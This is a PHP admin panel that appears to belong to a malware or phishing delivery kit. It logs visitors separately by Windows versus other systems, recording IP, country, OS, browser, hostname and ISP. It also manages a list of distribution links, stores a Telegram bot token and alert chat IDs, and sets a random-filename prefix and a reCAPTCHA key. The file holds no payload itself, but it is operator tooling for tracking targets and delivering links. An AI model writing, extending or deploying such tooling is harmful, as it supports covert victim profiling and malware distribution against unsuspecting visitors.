<?php
session_start();
$configFile = 'config.json';
$linksFile  = 'Links.txt';
$ipWFile    = 'ipw.txt';  // Windows visitors
$ipOFile    = 'ipo.txt';  // Non-Windows visitors

// Load Configuration
if (!file_exists($configFile)) {
    die("Error: Configuration file not found.");
}
$config = json_decode(file_get_contents($configFile), true);

// Check login
if (isset($_POST['admin_login'])) {
    if ($_POST['admin_password'] === $config['adminPassword']) {
        $_SESSION['admin_logged_in'] = true;
    } else {
        echo "<script>alert('Incorrect Password!');</script>";
    }
}

// Logout function
if (isset($_GET['logout'])) {
    session_destroy();
    header("Location: admin.php");
    exit();
}

// If NOT logged in, show login page
if (!isset($_SESSION['admin_logged_in'])):
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Admin Login</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-- Bootstrap CSS (CDN) -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet">
    <style>
        body {
            background: #000;
            color: #00ff00;
            font-family: 'Courier New', monospace;
        }
        .login-box {
            background: #111;
            border: 1px solid #00ff00;
            padding: 30px;
            border-radius: 8px;
        }
        .login-box input, .login-box button {
            border: 1px solid #00ff00;
            background: transparent;
            color: #00ff00;
        }
        .login-box button:hover {
            background: #00ff00;
            color: #000;
        }
    </style>
</head>
<body>
    <div class="d-flex vh-100">
        <div class="container my-auto">
            <div class="row justify-content-center">
                <div class="col-12 col-sm-8 col-md-6 col-lg-4">
                    <div class="login-box text-center">
                        <h2 class="mb-4">Admin Login</h2>
                        <form method="post">
                            <div class="mb-3">
                                <input type="password" name="admin_password" class="form-control" placeholder="Enter Admin Password" required>
                            </div>
                            <button type="submit" name="admin_login" class="btn w-100">Login</button>
                        </form>
                    </div>
                </div>
            </div>
        </div>
    </div>
</body>
</html>
<?php
exit();
endif;

// ------------------- Functions ------------------- //

// Parse single log file line: [YYYY-MM-DD HH:MM:SS] IP | Country | DeviceType | OS | Browser | Hostname | ISP
function parseLogLine($line) {
    $line = trim($line);
    if (empty($line)) return null;

    // Split off the timestamp part
    $parts = explode('] ', $line, 2);
    if (count($parts) < 2) return null;

    $timestamp = str_replace('[', '', $parts[0]);
    $dataPart  = $parts[1];

    $fields = explode(' | ', $dataPart);
    // We expect 7 fields
    if (count($fields) < 7) return null;

    return [
        'timestamp' => trim($timestamp),
        'ip'        => trim($fields[0]),
        'country'   => trim($fields[1]),
        'device'    => trim($fields[2]),
        'os'        => trim($fields[3]),
        'browser'   => trim($fields[4]),
        'hostname'  => trim($fields[5]),
        'isp'       => trim($fields[6])
    ];
}

// Parse all lines in a file
function parseLogFile($filePath) {
    if (!file_exists($filePath)) {
        return [];
    }
    $lines = file($filePath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    $results = [];
    foreach ($lines as $line) {
        $parsed = parseLogLine($line);
        if ($parsed) {
            $results[] = $parsed;
        }
    }
    return $results;
}

// ------------------- End Functions ------------------- //


// ------------------- Handle POST for Settings ------------------- //
if (isset($_POST['save_settings'])) {
    $config['telegramToken']         = $_POST['telegram_token'];
    $config['chatIdAlert']          = $_POST['chat_id_alert'];
    $config['chatIdTraffic']        = $_POST['chat_id_traffic'];
    $config['randomFilenamePrefix'] = $_POST['random_filename'];
    $config['recaptchaKey']         = $_POST['recaptcha_key'];

    file_put_contents($configFile, json_encode($config, JSON_PRETTY_PRINT));
    echo "<script>alert('Settings saved successfully!');</script>";
}

// ------------------- Handle POST for Adding Links ------------------- //
if (isset($_POST['add_links'])) {
    $newLinks = trim($_POST['new_links']);
    if (!empty($newLinks)) {
        file_put_contents($linksFile, $newLinks . PHP_EOL, FILE_APPEND);
        echo "<script>alert('Links added successfully!');</script>";
    }
}

// Read Existing Links
$existingLinks = file_exists($linksFile) ? file($linksFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) : [];
$linkCount     = count($existingLinks);

// ------------------- Collect Visitors Data ------------------- // 
$windowsVisitors = parseLogFile($ipWFile);
$otherVisitors   = parseLogFile($ipOFile);

// Merge them into one array
$allVisitors = array_merge($windowsVisitors, $otherVisitors);

// Sort by timestamp (desc)
usort($allVisitors, function($a, $b) {
    return strtotime($b['timestamp']) - strtotime($a['timestamp']);
});

$totalVisitors = count($allVisitors);
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Admin Panel</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-- Bootstrap CSS (CDN) -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet">
    <style>
        body {
            background: #0a0a0a;
            color: #00ff00;
            font-family: 'Courier New', monospace;
        }
        .navbar-dark .navbar-nav .nav-link {
            color: #00ff00 !important;
        }
        .navbar-dark .navbar-brand {
            color: #00ff00 !important;
        }
        .form-control, .btn {
            border: 1px solid #00ff00;
            background: transparent;
            color: #00ff00;
        }
        .form-control:focus, .btn:focus {
            box-shadow: none;
        }
        .btn:hover {
            background: #00ff00;
            color: #0a0a0a;
        }
        .scroll-box {
            max-height: 300px;
            overflow-y: auto;
        }
        table, th, td {
            border: 1px solid #00ff00 !important;
            color: #00ff00 !important;
        }
        .table thead th {
            background-color: #111;
        }
        .bg-section {
            background: #1a1a1a;
            border: 1px solid #2a2a2a;
            margin-bottom: 30px;
            border-radius: 8px;
            padding: 20px;
        }
        .section-title {
            border-bottom: 1px solid #2a2a2a;
            padding-bottom: 10px;
            margin-bottom: 20px;
        }
        /* Scrollbar styling (optional) */
        ::-webkit-scrollbar {
            width: 8px;
        }
        ::-webkit-scrollbar-thumb {
            background: #00ff00;
        }
        ::-webkit-scrollbar-track {
            background: #333;
        }
        .badge-green {
            background-color: #00ff00;
            color: #0a0a0a;
            font-weight: bold;
        }
    </style>
</head>
<body>
    <!-- Navbar -->
    <nav class="navbar navbar-dark bg-dark px-3">
        <a class="navbar-brand" href="#">Admin Panel</a>
        <div class="d-flex">
            <a class="nav-link" href="?logout">Logout</a>
        </div>
    </nav>

    <div class="container py-4">
        <!-- Admin Settings -->
        <div class="bg-section">
            <h2 class="section-title">Configuration</h2>
            <form method="post">
                <div class="row g-3">
                    <div class="col-sm-6">
                        <label>Bot Token:</label>
                        <input type="text" name="telegram_token" class="form-control" 
                               value="<?php echo htmlspecialchars($config['telegramToken']); ?>">
                    </div>
                    <div class="col-sm-6">
                        <label>Alert Chat ID:</label>
                        <input type="text" name="chat_id_alert" class="form-control" 
                               value="<?php echo htmlspecialchars($config['chatIdAlert']); ?>">
                    </div>
                    <div class="col-sm-6">
                        <label>Traffic Chat ID:</label>
                        <input type="text" name="chat_id_traffic" class="form-control" 
                               value="<?php echo htmlspecialchars($config['chatIdTraffic']); ?>">
                    </div>
                    <div class="col-sm-6">
                        <label>Random Filename Prefix:</label>
                        <input type="text" name="random_filename" class="form-control" 
                               value="<?php echo htmlspecialchars($config['randomFilenamePrefix']); ?>">
                    </div>
                    <div class="col-sm-12">
                        <label>reCAPTCHA Key:</label>
                        <input type="text" name="recaptcha_key" class="form-control" 
                               value="<?php echo htmlspecialchars($config['recaptchaKey']); ?>">
                    </div>
                    <div class="col-sm-12">
                        <button type="submit" name="save_settings" class="btn w-100 mt-3">
                            Save Configuration
                        </button>
                    </div>
                </div>
            </form>
        </div>

        <!-- Manage Links -->
        <div class="bg-section">
            <h2 class="section-title">
                Manage Links 
                <span class="badge badge-green ms-2">Count: <?php echo $linkCount; ?></span>
            </h2>
            <form method="post">
                <label>Add New Links (One per line):</label>
                <textarea name="new_links" class="form-control mb-3" rows="4"></textarea>
                <button type="submit" name="add_links" class="btn w-100">Add Links</button>
            </form>

            <h4 class="mt-4">Existing Links:</h4>
            <div class="bg-dark p-2 rounded mb-4 scroll-box">
                <?php if ($linkCount > 0): ?>
                    <?php foreach ($existingLinks as $link): ?>
                        <p class="mb-1"><?php echo htmlspecialchars($link); ?></p>
                    <?php endforeach; ?>
                <?php else: ?>
                    <p class="text-muted">No links available.</p>
                <?php endif; ?>
            </div>
        </div>

        <!-- Live Visitors -->
        <div class="bg-section">
            <h2 class="section-title">
                Live Visitors 
                <span class="badge badge-green ms-2">Total: <?php echo $totalVisitors; ?></span>
            </h2>
            <div class="table-responsive scroll-box">
                <table class="table table-dark table-striped table-hover mb-0">
                    <thead>
                        <tr>
                            <th>Timestamp</th>
                            <th>IP</th>
                            <th>Country</th>
                            <th>Device</th>
                            <th>OS</th>
                            <th>Browser</th>
                            <th>Hostname</th>
                            <th>ISP</th>
                        </tr>
                    </thead>
                    <tbody>
                    <?php if ($totalVisitors > 0): ?>
                        <?php foreach ($allVisitors as $visitor): ?>
                            <tr>
                                <td><?php echo htmlspecialchars($visitor['timestamp']); ?></td>
                                <td><?php echo htmlspecialchars($visitor['ip']); ?></td>
                                <td><?php echo htmlspecialchars($visitor['country']); ?></td>
                                <td><?php echo htmlspecialchars($visitor['device']); ?></td>
                                <td><?php echo htmlspecialchars($visitor['os']); ?></td>
                                <td><?php echo htmlspecialchars($visitor['browser']); ?></td>
                                <td><?php echo htmlspecialchars($visitor['hostname']); ?></td>
                                <td><?php echo htmlspecialchars($visitor['isp']); ?></td>
                            </tr>
                        <?php endforeach; ?>
                    <?php else: ?>
                        <tr>
                            <td colspan="8" class="text-center">No visitors found.</td>
                        </tr>
                    <?php endif; ?>
                    </tbody>
                </table>
            </div>
        </div>

        <!-- File Controls -->
        <div class="bg-section">
            <h2 class="section-title">File Controls</h2>
            <div class="d-flex flex-wrap gap-3">
                <a href="ipo.txt" target="_blank" class="btn btn-sm">View ipo.txt</a>
                <a href="ipw.txt" target="_blank" class="btn btn-sm">View ipw.txt</a>
            </div>
        </div>

        <!-- Delete Data -->
        <div class="bg-section">
            <h2 class="section-title">Delete Data</h2>
            <form action="delete.php" method="post">
                <label>Enter Password to Delete:</label>
                <input type="password" name="delete_password" class="form-control mb-3" required>
                <button type="submit" class="btn w-100">Delete Files</button>
            </form>
        </div>
    </div>
</body>
</html>
